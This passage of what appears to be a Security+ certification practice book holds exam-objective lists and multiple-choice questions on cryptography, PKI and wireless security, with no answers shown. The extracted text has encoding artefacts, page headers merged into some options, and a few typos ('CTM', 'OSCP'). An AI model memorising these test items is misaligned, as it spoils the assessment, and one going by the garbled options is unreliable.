5682â– â– AES
5683â– â– DES
5684â– â– 3DES
5685â– â– RC4
5686â– â– Blowfish/Twofish
5687Cipher modes
5688â– â– CBC
5689â– â– GCM
5690â– â– ECB
5691â– â– CTM
5692â– â– Stream vs. blockâ– â–
5693â– â–
5694â– â–
5695â– â–
5696Asymmetric algorithms
5697â– â– RSA
5698â– â– DSA
5699â– â– Diffie-Hellman
5700â– â– Groups
5701â– â– DHE
5702â– â– ECDHE
5703â– â– Elliptic curve
5704â– â– PGP/GPG
5705Hashing algorithms
5706â– â– MD5
5707â– â– SHA
5708â– â– HMAC
5709â– â– RIPEMD
5710Key stretching algorithms
5711â– â– BCRYPT
5712â– â– PBKDF2
5713Obfuscation
5714â– â– XOR
5715â– â– ROT13
5716â– â– Substitution ciphers
5717✓ ✓ 6.3 Given a scenario, install and configure wireless
5718security settings.
5719â– â–
5720â– â–
5721Cryptographic protocols
5722â– â– WPA
5723â– â– WPA2
5724â– â– CCMP
5725â– â– TKIP
5726Authentication protocols
5727â– â– EAP
5728â– â– PEAP
5729â– â– EAP-FASTâ– â–
5730â– â– EAP-TLS
5731â– â– EAP-TTLS
5732â– â– IEEE 802.1x
5733â– â– RADIUS Federation
5734Methods
5735â– â– PSK vs. Enterprise vs. Open
5736â– â– WPS
5737â– â– Captive portals
5738✓ ✓ 6.4 Given a scenario, implement public key infrastructure.
5739â– â–
5740â– â–
5741â– â–
5742Components
5743â– â– CA
5744â– â– Intermediate CA
5745â– â– CRL
5746â– â– OCSP
5747â– â– CSR
5748â– â– Certificate
5749â– â– Public key
5750â– â– Private key
5751â– â– Object identifiers (OID)
5752Concepts
5753â– â– Online vs. offline CA
5754â– â– Stapling
5755â– â– Pinning
5756â– â– Trust model
5757â– â– Key escrow
5758â– â– Certificate chaining
5759Types of certificates
5760â– â– Wildcard
5761â– â– SAN
5762â– â– Code signingâ– â–
5763â– â– Self-signed
5764â– â– Machine/computer
5765â– â– Email
5766â– â– User
5767â– â– Root
5768â– â– Domain validation
5769â– â– Extended validation
5770Certificate formats
5771â– â– DER
5772â– â– PEM
5773â– â– PFX
5774â– â– CER
5775â– â– P12
5776â– â– P7BChapter 6
5777168
5778â–
5779Cryptography and PKI
57801. Which of the following would a public key be used for?
5781A. To decrypt a hash of a digital signature
5782B. To encrypt TLS traffic
5783C. To digitally sign messages
5784D. To decrypt TLS messages
57852. Your company’s web server certificate has been revoked and external customers are
5786receiving errors when they connect to the website. Which of following actions must
5787you take?
5788A. Renew the certificate.
5789B. Create and use a self-signed certificate.
5790C. Request a certificate from the key escrow.
5791D. Generate a new key pair and new certificate.
57923. Mary is concerned about the validity of an email because a coworker denies sending it.
5793How can Mary prove the authenticity of the email?
5794A. Symmetric algorithm
5795B. Digital signature
5796C. CRL
5797D. Asymmetric algorithm
57984. Wi-Fi Alliance recommends that a passphrase be how many characters in length for
5799WPA2-Personal security?
5800A. 6 characters
5801B. 8 characters
5802C. 12 characters
5803D. 16 characters
58045. Which of the following digital certificate management practices will ensure that a lost
5805certificate is not compromised?
5806A. CRL
5807B. Key escrow
5808C. Nonrepudiation
5809D. Recovery agent
58106. Which of the following are restricted to 64-bit block sizes? (Choose two.)
5811A. DES
5812B. SHA
5813C. MD5
5814D. 3DESChapter 6
5815â–
5816Cryptography and PKI
5817169
58187. Your company has implemented a RADIUS server and has clients that are capable of using
5819multiple EAP types, including one configured for use on the RADIUS server. Your secu-
5820rity manager wants to implement a WPA2-Enterprise system. Since you have the RADIUS
5821server and clients, what piece of the network would you need?
5822A. Network access control
5823B. Authentication server
5824C. Authenticator
5825D. Supplicant
58268. You are given the task of selecting an asymmetric encryption type that has an appropriate
5827level of encryption strength but uses a smaller key length than is typically required. Which
5828of the following encryption methods will accomplish your requirement?
5829A. Blowfish
5830B. RSA
5831C. DHE
5832D. ECC
58339. Matt has been told that successful attacks have been taking place and data that has been
5834encrypted by his company’s software system has leaked to the company’s competitors.
5835Matt, through investigation, has discovered patterns due to the lack of randomness in
5836the seeding values used by the encryption algorithm in the company’s software. This
5837discovery has led to successful reverse engineering. What can the company use to ensure
5838patterns are not created during the encryption process?
5839A. One-time pad
5840B. Initialization vector
5841C. Stream cipher
5842D. Block cipher
584310. You are asked to configure a WLAN that does not require a user to provide any creden-
5844tials to associate with a wireless AP and access a WLAN. What type of authentication is
5845said to be in use?
5846A. IV
5847B. WEP
5848C. WPA
5849D. Open
585011. The CIO at your company no longer wants to use asymmetric algorithms because of the
5851cost. Of the following algorithms, which should the CIO discontinue using?
5852A. AES
5853B. RC4
5854C. RSA
5855D. TwofishChapter 6
5856170
5857â–
5858Cryptography and PKI
585912. Which of the following would you use to verify certificate status by receiving a response
5860of “good,†“revoked,†or “unknown�
5861A. CRL
5862B. OSCP
5863C. RA
5864D. PKI
586513. Which of the following symmetric key algorithms are block ciphers? (Choose two.)
5866A. MD5
5867B. 3DES
5868C. RC4
5869D. Blowfish
587014. Which of the following encryption algorithms is the weakest?
5871A. Blowfish
5872B. AES
5873C. DES
5874D. SHA
587515. What encryption protocol does WEP improperly use?
5876A. RC6
5877B. RC4
5878C. AES
5879D. DES
588016. James, an IT manager, expresses a concern during a monthly meeting about weak user
5881passwords used on company servers and how they may be susceptible to brute-force
5882password attacks. Which concept can James implement to make the weak passwords
5883stronger?
5884A. Key stretching
5885B. Key escrow
5886C. Key strength
5887D. ECC
588817. You are installing a network for a small business named Matrix Interior Design that the
5889owner is operating out of their home. There are only four devices that will use the wireless
5890LAN, and you are installing a SOHO wireless router between the wireless LAN clients
5891and the broadband connection. To ensure better security from outside threats connecting
5892to the wireless SOHO router, which of the following would be a good choice for the
5893WPA2-PSK passphrase?
5894A. 123456
5895B.
5896XXrcERr6Euex9pRCdn3h3Chapter 6
5897C. bRtlBv
5898D. HomeBusiness
5899â–
5900Cryptography and PKI
5901171
590218. You set up your wireless SOHO router to encrypt wireless traffic, and you configure the
5903router to require wireless clients to authenticate against a RADIUS server. What type of
5904security have you configured?
5905A. WPA2 Enterprise
5906B. WPA2 Personal
5907C. TKIP
5908D. WEP
590919. You must implement a cryptography system that applies encryption to a group of data at a
5910time. Which of the following would you choose?
5911A. Stream
5912B. Block
5913C. Asymmetric
5914D. Symmetric
591520. Which symmetric block cipher supersedes Blowfish?
5916A. RSA
5917B. Twofish
5918C. MD5
5919D. PBKDF2
592021. Root CAs can delegate their authority to which of the following to issue certificates to
5921users?
5922A. Registered authorities
5923B. Intermediate CAs
5924C. CRL
5925D. CSR
592622. Which of the following protocols should be used to authenticate remote access users with
5927smartcards?
5928A. PEAP
5929B. EAP-TLS
5930C. CHAP
5931D. MS-CHAPv2
593223. Tom is sending Mary a document and wants to show the document came from him.
5933Which of the following should Tom use to digitally sign the document?
5934A. TKIP
5935B. Intermediate CA
5936C. Public key
5937D. Private keyChapter 6
5938172
5939â–
5940Cryptography and PKI
594124. Which of the following EAP types offers support for legacy authentication protocols such
5942as PAP, CHAP, MS-CHAP, or MS-CHAPv2?
5943A. PEAP
5944B. EAP-FAST
5945C. EAP-TLS
5946D. EAP-TTLS
594725. You are conducting a training program for new network administrators for your
5948company. You talk about the benefits of asymmetric encryption. Which of the following
5949are considered asymmetric algorithms? (Choose two.)
5950A. RC4
5951B. DES
5952C. RSA
5953D. ECC
595426. Which of the following is a form of encryption also known as ROT13?
5955A. Substitution cipher
5956B. Transposition cipher
5957C. Diffusion
5958D. Confusion
595927. Matt needs to calculate the number of keys that must be generated for 480 employees
5960using the company’s PKI asymmetric algorithm. How many keys must Matt create?
5961A. 114,960
5962B. 480
5963C. 960
5964D. 229,920
596528. You are conducting a one-time electronic transaction with another company. The transac-
5966tion needs to be encrypted, and for efficiency and simplicity, you want to use a single key
5967for encryption and decryption of the data. Which of the following types would you use?
5968A. Asymmetric
5969B. Symmetric
5970C. Hashing
5971D. Steganography
597229. Which of the following uses two mathematically related keys to secure data during
5973transmission?
5974A. Twofish
5975B. 3DES
5976C. RC4
5977D. RSAChapter 6
5978â–
5979Cryptography and PKI
5980173
598130. You have been instructed by the security manager to protect the server’s data-at-rest.
5982Which of the following would provide the strongest protection?
5983A. Implement a full-disk encryption system.
5984B. Implement biometric controls on data entry points.
5985C. Implement a host-based intrusion detection system.
5986D. Implement a host-based intrusion prevention system.
598731. Which of the following EAP types use a three-phase operation?
5988A. EAP-FAST
5989B. EAP-TLS
5990C. EAP-TTLS
5991D. PEAP
599232. Which of the following is an encryption standard that uses a single 56-bit symmetric key?
5993A. DES
5994B. 3DES
5995C. AES
5996D. WPS
599733. Which of the following cryptography concepts converts output data into a fixed-length
5998value and cannot be reversed?
5999A. Steganography
6000B. Hashing
6001C. Collision
6002D. IV
600334. SSL is a protocol used for securing transactions transmitting over an untrusted network
6004such as the Internet. Which of the following best describes the action that occurs during
6005the SSL connection setup process?
6006A. The client creates a session key and encrypts it with the server’s private key.
6007B. The client creates a session key and encrypts it with the server’s public key.
6008C. The server creates a session key and encrypts it with the client’s private key.
6009D. The server creates a session key and encrypts it with the client’s public key.
601035. Which of the following EAP types requires both server and client certificates?
6011A. EAP-FAST
6012B. PEAP
6013C. EAP-TLS
6014D. EAP-TTLSChapter 6
6015174
6016â–
6017Cryptography and PKI
601836. You are the network administrator for a small office of 35 users and need to utilize mail
6019encryption that will allow specific users to encrypt outgoing email messages. You are
6020looking for an inexpensive onsite encryption server. Which of the following would you
6021implement?
6022A. PGP/GPG
6023B. WPA2
6024C. CRL
6025D. EAP-TLS
602637. You have been promoted to security administrator for your company and you need to be
6027aware of all types of hashing algorithms for integrity checks. Which algorithm offers a
6028160-bit digest?
6029A. MD5
6030B. RC4
6031C. SHA-1
6032D. AES
603338. You are the security manager for your company, and a system administrator wants to
6034know if there is a way to reduce the cost of certificates by purchasing a certificate to cover
6035all domains and subdomains for the company. Which of the following solutions would
6036you offer?
6037A. Wildcards
6038B. Object identifiers
6039C. Key escrow
6040D. OCSP
604139. Which of the following are authentication protocols? (Choose two.)
6042A. WPS
6043B. EAP
6044C. IPSec
6045D. IEEE 802.1x
604640. Your company is looking to accept electronic orders from a vendor and wants to ensure
6047nonauthorized people cannot send orders. Your manager wants a solution that provides
6048nonrepudiation. Which of the following options would meet the requirements?
6049A. Digital signatures
6050B. Hashes
6051C. Steganography
6052D. Perfect forward secrecy
605341. You are tasked to implement a solution to ensure data that are stored on a removable USB
6054drive hasn’t been tampered with. Which of the following would you implement?
6055A. Key escrow
6056B.
6057File backupChapter 6
6058C. File encryption
6059D. File hashing
6060â–
6061Cryptography and PKI
6062175
606342. Which of the following is mainly used for remote access into a network?
6064A. TACACS+
6065B. XTACACS
6066C. Kerberos
6067D. RADIUS
606843. A security manager has asked you to explain why encryption is important and what
6069symmetric encryption offers. Which of the following is the best explanation?
6070A. Confidentiality
6071B. Nonrepudiation
6072C. Steganography
6073D. Collision
607444. You are a security administrator and have discovered one of the employees has been
6075encoding confidential information into graphic files. Your employee is sharing these pic-
6076tures on their social media account. What concept was the employee using?
6077A. Hashing
6078B. Steganography
6079C. Symmetric algorithm
6080D. Asymmetric algorithm
608145. Your company’s branch offices connect to the main office through a VPN. You recently
6082discovered the key used on the VPN has been compromised. What should you do to
6083ensure the key isn’t compromised in the future?
6084A. Enable perfect forward secrecy at the main office and branch office ends of the VPN.
6085B. Enable perfect forward secrecy at the main office end of the VPN.
6086C. Enable perfect forward secrecy at the branch office end of the VPN.
6087D. Disable perfect forward secrecy at the main office and branch office ends of the VPN.
608846. You are configuring your friend’s new wireless SOHO router and discover a PIN on the
6089back of the router. Which of the following best describes the purpose of the PIN?
6090A. This is a WEP PIN.
6091B. This is a WPS PIN.
6092C. This is a WPA PIN.
6093D. This is a Bluetooth PIN.
609447. Which of the following benefits do digital signatures provide? (Choose two.)
6095A. Nonrepudiation
6096B. Authentication
6097C. Encryption
6098D. Key exchangeChapter 6
6099176
6100â–
6101Cryptography and PKI
610248. Your company has asked you to recommend a secure method for password storage. Which
6103of the following would provide the best protection against brute-force attacks? (Choose
6104two.)
6105A. ROT13
6106B. MD5
6107C. PBKDF2
6108D. BCRYPT
610949. Your IT support center is receiving a high number of calls stating that users trying to
6110access the company’s website are receiving certificate errors within their browsers. Which
6111of the following statements best describes what the issue is?
6112A. The website certificate has expired.
6113B. Users have forgotten their usernames or passwords.
6114C. The domain name has expired.
6115D. The network is currently unavailable.
611650. In asymmetric encryption, what is used to decrypt an encrypted file?
6117A. Private key
6118B. Public key
6119C. Message digest
6120D. Ciphertext
612151. You are performing a vulnerability assessment on a company’s LAN and determine they
6122are using 802.1x for secure access. Which of the following attacks can a threat actor use
6123to bypass the network security?
6124A. MAC spoofing
6125B. ARP poisoning
6126C. Ping of death
6127D. Xmas attack
612852. Your security manager is looking to implement a one-time pad scheme for the company’s
6129salespeople to use when traveling. Which of the following best describes a requirement for
6130this implementation? (Choose three.)
6131A. The pad must be distributed securely and protected at its destination.
6132B. The pad must always be the same length.
6133C. The pad must be used only one time.
6134D. The pad must be made up of truly random values.
613553. A threat actor has created a man-in-the-middle attack and captured encrypted communi-
6136cation between two users. The threat actor was unable to decrypt the messages. Which of
6137the following is the reason the threat actor is unable to decrypt the messages?
6138A. Hashing
6139B.
6140Symmetric encryptionChapter 6
6141C. Asymmetric encryption
6142D. Key escrow
6143â–
6144Cryptography and PKI
6145177
614654. You have implemented a PKI to send signed and encrypted data. The user sending data
6147must have which of the following? (Choose two.)
6148A. The receiver’s private key
6149B. The sender’s private key
6150C. The sender’s public key
6151D. The receiver’s public key
615255. Which of the following best describes the drawback of symmetric key systems?
6153A. You must use different keys for encryption and decryption.
6154B. The algorithm is more complex.
6155C. The system works much more slowly than an asymmetric system.
6156D. The key must be delivered in a secure manner.
615756. Your company is looking for a secure backup mechanism for key storage in a PKI. Which
6158of the following would you recommend?
6159A. CSR
6160B. Key escrow
6161C. CRL
6162D. CA
616357. Which cryptography concept uses points on a curve to define public and private key pairs?
6164A. Obfuscation
6165B. ECC
6166C. Stream cipher
6167D. Block cipher
616858. You are a security administrator and have been given instructions to update the access
6169points to provide a more secure connection. The access points are currently set to use
6170WPA TKIP for encryption. Which of the following would you configure to accomplish the
6171task of providing a more secure connection?
6172A. WEP
6173B. WPA2 CCMP
6174C. Enable MAC filtering
6175D. Disable SSID broadcast
617659. Which of the following is an example of a stream cipher?
6177A. AES
6178B. DES
6179C. 3DES
6180D. RC4Chapter 6
6181178
6182â–
6183Cryptography and PKI
618460. Which of the following are negotiation protocols commonly used by TLS? (Choose two.)
6185A. DHE
6186B. ECDHE
6187C. RSA
6188D. SHA
618961. Which of the following statements is true regarding symmetric key systems?
6190A. They use different keys on each end of the transported data.
6191B. They use public key cryptography.
6192C. They use multiple keys for creating digital signatures.
6193D. They use the same key on each end of the transported data.
619462. Which of the following ciphers was created from the foundation of the Rijndael
6195algorithm?
6196A. TKIP
6197B. AES
6198C. DES
6199D. 3DES
620063. Katelyn is sending an important email to Zackary, the manager of human resources.
6201Company policy states messages to human resources must be digitally signed. Which of
6202the following statements is correct?
6203A. Katelyn’s public key is used to verify the digital signature.
6204B. Katelyn’s private key is used to verify the digital signature.
6205C. Zackary’s public key is used to verify the digital signature.
6206D. Zackary’s private key is used to verify the digital signature.
620764. Data integrity is provided by which of the following?
6208A. 3DES
6209B. MD5
6210C. AES
6211D. Blowfish
621265. Which of the following is a symmetric encryption algorithm that is available in 128-bit,
6213192-bit, and 256-bit key versions?
6214A. AES
6215B. DES
6216C. RSA
6217D. TKIPChapter 6
6218â–
6219Cryptography and PKI
6220179
622166. Which of the following items are found within a digital certificate? (Choose two.)
6222A. Serial number
6223B. Default gateway
6224C. Public key
6225D. Session key
622667. In an 802.1x implementation, which of the following devices mutually authenticate with
6227each other? (Choose two.)
6228A. Authentication server
6229B. Certificate authority
6230C. Domain controller
6231D. Supplicant
623268. Which of the following statements is true regarding the confusion encryption method?
6233A. It puts one item in the place of another; for example, one letter for another or one
6234letter for a number.
6235B. It scrambles data by reordering the plain text in a certain way.
6236C. It uses a relationship between the plain text and the key that is so complicated the
6237plain text can’t be altered and the key can’t be determined.
6238D. Change in the plain text will result in multiple changes that are spread throughout
6239the cipher text.
624069. Which of the following is required when employing PKI and preserving data is important?
6241A. CA
6242B. CRL
6243C. Key escrow
6244D. CER
624570. You need to encrypt the signature of an email within a PKI system. Which of the follow-
6246ing would you use?
6247A. CER
6248B. Public key
6249C. Shared key
6250D. Private key
625171. Which of the following standards was developed by the Wi-Fi Alliance and implements
6252the requirements of IEEE 802.11i?
6253A. NIC
6254B. WPA
6255C. WPA2
6256D. TKIPChapter 6
6257180
6258â–
6259Cryptography and PKI
626072. You are asked to create a wireless network for your company that implements a wire-
6261less protocol that provides maximum security while providing support for older wireless
6262devices. Which protocol should you use?
6263A. WPA
6264B. WPA2
6265C. WEP
6266D. IV
626773. Bob is a security administrator and needs to encrypt and authenticate messages that are
6268sent and received between two systems. Which of the following would Bob choose to
6269accomplish his task?
6270A. Diffie-Hellman
6271B. MD5
6272C. SHA-256
6273D. RSA
627474. Which of the following algorithms is generally used in mobile devices?
6275A. 3DES
6276B. DES
6277C. ECC
6278D. AES
627975. Which of the following statements best describes the difference between public key
6280cryptography and public key infrastructure?
6281A. Public key cryptography is another name for an asymmetric algorithm, whereas
6282public key infrastructure is another name for a symmetric algorithm.
6283B. Public key cryptography uses one key to encrypt and decrypt the data, and public key
6284infrastructure uses two keys to encrypt and decrypt the data.
6285C. Public key cryptography is another name for asymmetric cryptography, whereas
6286public key infrastructure contains the public key cryptographic mechanisms.
6287D. Public key cryptography provides authentication and nonrepudiation, whereas public
6288key infrastructure provides confidentiality and integrity.
628976. Your company has a public key infrastructure (PKI) in place to issue digital certificates to
6290users. Recently, your company hired temporary contractors for a project that is now com-
6291plete. Management has requested that all digital certificates issued to the contractors be
6292revoked. Which PKI component would you consult for the management’s request?
6293A. CA
6294B. CRL
6295C. RA
6296D. CSRChapter 6
6297â–
6298Cryptography and PKI
6299181
630077. Which of the following security setup modes are intended for use in a small office or
6301home office environment? (Choose two.)
6302A. WPS
6303B. WPA-Enterprise
6304C. WPA2-Enterprise
6305D. WPA2-Personal
630678. Which of the following automatically updates browsers with a list of root certificates from
6307an online source to track which certificates are to be trusted?
6308A. Trust model
6309B. Key escrow
6310C. PKI
6311D. RA
631279. Which of the following EAP types uses the concepts of public key infrastructure (PKI)?
6313A. EAP-TLS
6314B. PEAP
6315C. EAP-FAST
6316D. EAP-TTLS
631780. Which of the following use PSK authentication? (Choose two.)
6318A. WPA-Enterprise
6319B. WPA-Personal
6320C. WPA2-Personal
6321D. WPA2-Enterprise
632281. You are receiving calls from users who are connected to the company’s network and
6323are being redirected to a login page with the company’s logo after they type a popular
6324social media web address in an Internet browser. Which of the following is causing this to
6325happen?
6326A. WEP
6327B. Key stretching
6328C. MAC filtering
6329D. Captive portal
633082. Elliptic curve cryptosystem (ECC) is an asymmetric algorithm. Which of the following
6331statements best describe why ECC is different from other asymmetric algorithms?
6332(Choose two.)
6333A. It is more efficient.
6334B. It provides digital signatures, secure key distribution, and encryption.
6335C. It uses more processing power to perform encryption.
6336D. It provides fast key generation.Chapter 6
6337182
6338â–
6339Cryptography and PKI
634083. WEP’s RC4 approach to encryption uses a 24-bit string of characters added to data
6341that are transmitted. The same plain text data frame will not appear as the same WEP-
6342encrypted data frame. What is this string of characters called?
6343A. Diffusion
6344B. IV
6345C. Session key
6346D. Hashing
634784. Your manager has recently purchased a RADIUS server that will be used by remote
6348employees to connect to internal resources. Several client computers need to connect to the
6349RADIUS server in a secure manner. What should your manager deploy?
6350A. HIDS
6351B. UTM
6352C. VLAN
6353D. 802.1x
635485. Katelyn, a network administrator, has deleted the account for a user who left the company
6355last week. The user’s files were encrypted with a private key. How can Katelyn view the
6356user’s files?
6357A. The data can be decrypted using the backup user account.
6358B. The data can be decrypted using the recovery agent.
6359C. She must re-create the former user’s account.
6360D. The data can be decrypted using a CRL.
636186. Your company has recently implemented an encryption system on the network. The sys-
6362tem uses a secret key between two parties and must be kept secret. Which system was
6363implemented?
6364A. Asymmetric algorithm
6365B. Symmetric algorithm
6366C. Hashing algorithm
6367D. Steganography
636887. Tim, a wireless administrator, has been tasked with securing the company’s WLAN.
6369Which of the following cryptographic protocols would Tim use to provide the most secure
6370environment for the company?
6371A. WPA2 CCMP
6372B. WEP
6373C. WPA
6374D. WPA2 TKIPChapter 6
6375â–
6376Cryptography and PKI
6377183
637888. Which of the following defines a hashing algorithm creating the same hash value from
6379two different messages?
6380A. AES
6381B. MD5
6382C. Hashing
6383D. Collision
638489. Matt, a network administrator, is deciding which credential-type authentication to
6385use within the company’s planned 802.1x deployment. He is searching for a method
6386that requires a client certificate and a server-side certificate, and that uses tunnels for
6387encryption. Which credential-type authentication method would Matt use?
6388A. EAP-TLS
6389B. EAP-FAST
6390C. PEAP
6391D. EAP
639290. A coworker is connecting to a secure website using HTTPS. The coworker informs you that
6393before the website loads, their web browser displays an error indicating that the site certifi-
6394cate is invalid and the site is not trusted. Which of the following is most likely the issue?
6395A. The web browser is requiring an update.
6396B. The server is using a self-signed certificate.
6397C. A web proxy is blocking the connection.
6398D. The web server is currently unavailable.
639991. Zack, an administrator, needs to renew a certificate for the company’s web server. Which
6400of the following would you recommend Zack submit to the CA?
6401A. CSR
6402B. Key escrow
6403C. CRL
6404D. OCSP
640592. Which of the following types of encryption offers easy key exchange and key management?
6406A. Obfuscation
6407B. Asymmetric
6408C. Symmetric
6409D. Hashing
641093. Which of the following is used to exchange cryptographic keys?
6411A. Diffie-Hellman
6412B. HMAC
6413C. ROT13
6414D. RC4Chapter 6
6415184
6416â–
6417Cryptography and PKI
641894. Which of the following encryption algorithms is used to encrypt and decrypt data?
6419A. MD5
6420B. HMAC
6421C. Kerberos
6422D. RC4
642395. Which of the following provides additional encryption strength by repeating the encryp-
6424tion process with additional keys?
6425A. 3DES
6426B. AES
6427C. Twofish
6428D. Blowfish
642996. Which of the following security mechanisms can be used for the purpose of nonrepudia-
6430tion?
6431A. Encryption
6432B. Digital signature
6433C. Collision
6434D. CA
643597. You are a network administrator for your company, and the single AP that allows cli-
6436ents to connect to the wireless LAN is configured with a WPA-PSK preshared key of the
6437company name followed by the number 1. Which of the following statements is correct
6438regarding this implementation?
6439A. It is secure because WPA-PSK resolved the problem with WEP.
6440B. It is secure because the preshared key is at least five characters long.
6441C. It is not secure because the preshared key includes only one number and the company
6442name so it can be easily guessed.
6443D. It is not secure because WPA-PSK is as insecure as WEP and should never be used.
644498. You are a security technician and have been given the task to implement a PKI on the
6445company’s network. When verifying the validity of a certificate, you want to ensure
6446bandwidth isn’t consumed. Which of the following can you implement?
6447A. CRL
6448B. OCSP
6449C. Key escrow
6450D. CA
645199. Which of the following types of device are found in a network that supports Wi-Fi
6452Protected Setup (WPS) protocol? (Choose three.)
6453A. Registrar
6454B. Supplicant
6455C. Enrollee
6456D. Access PointChapter 6
6457â–
6458Cryptography and PKI
6459185
6460100. You are a network administrator for a distribution company and the manager wants to
6461implement a secure wireless LAN for a BYOD policy. Through research, you determine that
6462the company should implement AES encryption and the 802.1x authentication protocol. You
6463also determine that too many APs and clients will be installed and you will need to configure
6464each one with a preshared key passphrase. Which of the following will meet your needs?
6465A. WEP
6466B. WPA
6467C. WPA2-Personal
6468D. WPA2-Enterprise
6469101. The process of deleting data by sending a single erase or clear instruction to an address of
6470the nonvolatile memory is an example of securing which of the following?
6471A. Data-in-transit
6472B. Data-over-the-network
6473C. Data-in-use
6474D. Data-at-rest
6475102. Which of the following is an authentication service and uses UDP as a transport medium?
6476A. TACACS+
6477B. RADIUS
6478C. LDAP
6479D. Kerberos
6480103. Which of the following is true regarding the importance of encryption of data-at-rest for
6481sensitive information?
6482A. It renders the recovery of data more difficult should the user lose their password.
6483B. It allows the user to verify the integrity of the data on the stored device.
6484C. It prevents the sensitive data from being accessed after a theft of the physical equipment.
6485D. It renders the recovery of data easier should the user lose their password.
6486104. You are a network administrator and your manager has asked you to enable WPA2
6487CCMP for wireless clients, along with an encryption to protect the data transmitting
6488across the network. Which of the following encryption methods would you use along with
6489WPA2 CCMP?
6490A. RC4
6491B. DES
6492C. AES
6493D. 3DES
6494105. Which of the following is the least secure hashing algorithm?
6495A. MD5
6496B. RIPEMD
6497C. SHA-1
6498D. AESChapter 6
6499186
6500â–
6501Cryptography and PKI
6502106. Which of the following types of attack sends two different messages using the same hash
6503function, causing a collision?
6504A. Xmas attack
6505B. DoS
6506C. Logic bomb
6507D. Birthday attack
6508107. Which of the following defines a file format commonly used to store private keys with
6509associated public key certificates?
6510A. PKCS #1
6511B. PKCS #3
6512C. PKCS #7
6513D. PKCS #12
6514108. Which of the following statements are true regarding ciphers? (Choose two.)
6515A. Stream ciphers encrypt fixed sizes of data.
6516B. Stream ciphers encrypt data one bit at a time.
6517C. Block ciphers encrypt data one bit at a time.
6518D. Block ciphers encrypt fixed sizes of data.
6519109. How many effective key sizes of bits does 3DES have? (Choose three.)
6520A. 56
6521B. 112
6522C. 128
6523D. 168
6524110. Which of the following statements is true about symmetric algorithms?
6525A. They hide data within an image file.
6526B. They use one key to encrypt data and another to decrypt data.
6527C. They use a single key to encrypt and decrypt data.
6528D. They use a single key to create a hashing value.
6529111. The CA is responsible for revoking certificates when necessary. Which of the following
6530statements best describes the relationship between a CRL and OSCP?
6531A. OCSP is a protocol to submit revoked certificates to a CRL.
6532B. CRL is a more streamlined approach to OCSP.
6533C. CRL validates a certificate in real time and reports it to the OCSP.
6534D. OCSP is a protocol to check the CRL during a certificate validation process.Chapter 6
6535â–
6536Cryptography and PKI
6537187
6538112. Which of the following takes each bit in a character and is XORed with the corresponding
6539bit in the secret key?
6540A. ECDHE
6541B. PBKDF2
6542C. Obfuscation
6543D. One-time pad
6544113. Which of the following works similarly to stream ciphers?
6545A. One-time pad
6546B. RSA
6547C. AES
6548D. DES
6549114. Your manager wants to implement a security measure to protect sensitive company data
6550that reside on the remote salespeople’s laptops should they become lost or stolen. Which
6551of the following measures would you implement?
6552A. Implement WPS on the laptops.
6553B. Set BIOS passwords on the laptops.
6554C. Use whole-disk encryption on the laptops.
6555D. Use cable locks on the laptops.
6556115. You want to send confidential messages to a friend through email, but you do not have a
6557way of encrypting the message. Which of the following methods would help you achieve
6558this goal?
6559A. AES
6560B. Collision
6561C. RSA
6562D. Steganography
6563116. Which of the following cipher modes uses a feedback-based encryption method to ensure
6564that repetitive data result in unique cipher text?
6565A. ECB
6566B. CBC
6567C. GCM
6568D. CTM
6569117. Which statement is true regarding the difference between a secure cipher and a secure
6570hash?
6571A. A secure hash can be reversed; a secure cipher cannot.
6572B. A secure cipher can be reversed; a secure hash cannot.
6573C. A secure hash produces a variable output for any input size; a secure cipher does not.
6574D. A secure cipher produces the same size output for any input size; a hash does not.Chapter 6
6575188
6576â–
6577Cryptography and PKI
6578118. Which certificate format is typically used on Windows OS machines to import and export
6579certificates and private keys?
6580A. DER
6581B. AES
6582C. PEM
6583D. PFX
6584119. What is another name for an ephemeral key?
6585A. PKI private key
6586B. MD5
6587C. PKI public key
6588D. Session key
6589120. Why would a threat actor use steganography?
6590A. To test integrity
6591B. To conceal information
6592C. To encrypt information
6593D. To create a hashing value
6594121. The CIO has instructed you to set up a system where credit card data will be encrypted
6595with the most secure symmetric algorithm with the least amount of CPU usage. Which of
6596the following algorithms would you choose?
6597A. AES
6598B. SHA-1
6599C. MD5
6600D. 3DES
6601122. Which of the following encryption methods is used by RADIUS?
6602A. Asymmetric
6603B. Symmetric
6604C. Elliptic curve
6605D. RSA
6606123. When setting up a secure wireless company network, which of the following should you
6607avoid?
6608A. WPA
6609B. WPA2
6610C. EAP-TLS
6611D. PEAPChapter 6
6612â–
6613Cryptography and PKI
6614189
6615124. You want to authenticate and log connections from wireless users connecting with
6616EAP-TLS. Which of the following should be used?
6617A. Kerberos
6618B. LDAP
6619C. SAML
6620D. RADIUS
6621125. Which of the following would be used to allow certain traffic to traverse from a wireless
6622network to an internal network?
6623A. WPA
6624B. WEP
6625C. Load balancers
6626D. 802.1x
6627126. You are asked to see if several confidential files have changed, and you decide to use an
6628algorithm to create message digests for the confidential files. Which algorithm would
6629you use?
6630A. AES
6631B. RC4
6632C. Blowfish
6633D. SHA-1
6634127. Network data needs to be encrypted, and you are required to select a cipher that will
6635encrypt 128 bits at a time before the data are sent across the network. Which of the
6636following would you choose?
6637A. Stream cipher
6638B. Hash algorithm
6639C. Block cipher
6640D. Obfuscation
6641128. Which of the following are considered cryptographic hash functions? (Choose two.)
6642A. AES
6643B. MD5
6644C. RC4
6645D. SHA-256
6646129. A company’s database is beginning to grow, and the data-at-rest are becoming a concern
6647with the security administrator. Which of the following is an option to secure the
6648data-at-rest?
6649A. SSL certificate
6650B. Encryption
6651C. Hashing
6652D. TLS certificateChapter 6
6653190
6654â–
6655Cryptography and PKI
6656130. Which of the following hardware devices can store keys? (Choose two.)
6657A. USB flash drive
6658B. Smartcard
6659C. PCI expansion card
6660D. Cipher lock
6661131. You are a security manager and have been asked to encrypt database system information
6662that contains employee social security numbers. You are looking for an encryption stan-
6663dard that is fast and secure. Which of the following would you suggest to accomplish the
6664requirements?
6665A. SHA-256
6666B. AES
6667C. RSA
6668D. MD5
6669132. James is a security administrator and wants to ensure the validity of public trusted certifi-
6670cates used by the company’s web server, even if there is an Internet outage. Which of the
6671following should James implement?
6672A. Key escrow
6673B. Recovery agent
6674C. OCSP
6675D. CSR
6676133. You are a security administrator looking to implement a two-way trust model. Which of
6677the following would you use?
6678A. ROT13
6679B. PGP
6680C. WPA2
6681D. PKI
6682134. If a threat actor obtains an SSL private key, what type of attack can be performed?
6683(Choose two.)
6684A. Eavesdropping
6685B. Man-in-the-middle
6686C. Social engineering
6687D. Brute force
6688135. Most authentication systems make use of a one-way encryption process. Which of the
